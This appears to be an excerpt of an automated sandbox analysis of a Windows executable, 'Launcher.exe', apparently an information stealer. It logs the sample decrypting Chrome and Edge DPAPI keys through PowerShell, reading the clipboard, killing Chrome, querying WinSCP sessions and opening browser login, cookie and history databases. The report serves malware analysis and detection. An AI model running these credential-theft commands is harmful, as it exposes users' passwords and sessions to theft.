          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostnameJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE00D.tmp" "c:\Users\user\AppData\Local\Temp\0a5bipl0\CSC1B434CDB8C1C4BC4B88560F934C57755.TMP"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /FJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ClipboardJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /FJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'currentuser')"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'currentuser')
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'currentuser')"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'currentuser')
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'currentuser')"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'currentuser')"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'currentuser')Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'currentuser')Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\temp.ps1 VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite VolumeInformationJump to behavior
